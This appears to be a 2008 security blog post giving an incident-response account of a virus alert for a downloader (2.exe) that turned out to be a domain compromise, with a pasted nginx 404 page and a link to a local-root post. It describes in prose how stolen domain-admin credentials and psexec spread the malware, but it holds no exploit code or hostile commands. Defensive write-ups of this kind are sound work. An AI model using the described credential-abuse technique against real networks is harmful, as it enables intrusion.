HTTP/1.1 404 Not Found
Server: nginx/0.5.20
Date: Wed, 15 Oct 2008 20:27:23 GMT
Content-Type: text/html
Content-Length: 529
Connection: close


html
head title 404 Not Found /title /head
body bgcolor="white"
center h1 404 Not Found /h1 /center
hr center nginx/0.5.20 /center
/body
/html
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --

**I removed the brackets because blogspot kept rendering the html :-(

From Virus Alert to Pwnage Part 1

The first week of your new job is normally for finding your desk, getting email set up, finding the best place to grab coffee and snacks. We'll not for me!

What started Tuesday morning as simple virus outbreak on one of the networks we monitor after some initial IR turned into full domain pwnage :-(

The initial virus alert looked something like this:

Alert: Virus Found
Computer:
Date:
Time: 1:34:59 AM
Severity: Critical
Source: Symantec AntiVirus Corporate Edition
File Path:C:\WINDOWS\system32\2.exe
User:
Virus Name:Downloader

A quick question for anyone reading is what kind of privileges are required to write to the system32 folder? The answer should be you first clue to the scope of the problem.

We jumped in on one of the boxes that came up with the virus alert to see what we could find.

A quick review of the task manager listed 6 or 7 iexplore.exe process running by a user that wasn't logged into the host. A quick net user "thatuser" /domain let us know that the user was a member of the domain admins group...oops. We did do a quick call to confirm that the real user hadn't logged into that box.

The iexplore.exe process was connected to an IP that resolved to Amsterdam pulling down a "banner8.gif and banner9.gif". Thus far we haven't located any copies of banner8.gif and banner9.gif on the network and the IP isn't serving them up right now (404). We've asked for FW logs to see if any hosts actually got a 200 for for the file(s).

I'll post what (most dean) came up with for analysis of 2.exe in a separate post.

Lastly, they had a Cisco CSA agent running (in test mode) on one of the hosts that was infected in test mode. The logs of the agent had an alert of psexec executing 2.exe with the domain admins user creds...oops. The good news (for the CSA deployment) was that it would have been blocked had CSA been in enforcement mode. Bad news was that it wasn't.

We also had the domain profile of the unfortunate user show up on all the infected boxes. I'm guessing its a result of the psexec command, but if anyone has any insight on that I'd appreciate a comment.

Any comments on the situation. At this point, what would you do?

More to follow...

Reliable Local Root since 2006?

now that's just friggin sweet...

http://blog.eonsec.com/2008/02/reliable-root-since-2006.html